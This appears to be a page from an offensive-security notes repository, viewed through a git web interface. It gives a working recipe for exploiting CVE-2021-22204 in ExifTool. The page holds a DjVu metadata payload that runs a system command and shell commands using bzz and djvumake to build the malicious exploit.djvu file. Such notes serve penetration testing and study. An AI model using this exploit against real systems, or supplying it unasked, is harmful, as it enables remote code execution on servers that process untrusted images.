killchain-compendium/Exploits/Linux/ExifTool.md

13 lines
346 B
Markdown
Raw Normal View History

2022-11-13 22:38:01 +01:00
# CVE-2021-22204
* Craft an a payload and execute it via exiftool
* [Article](https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/)
## Usage
* Payload is `(metadata "\c${system('id')};")`
```sh
sudo apt install djvulibre-bin
bzz payload payload.bzz
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
```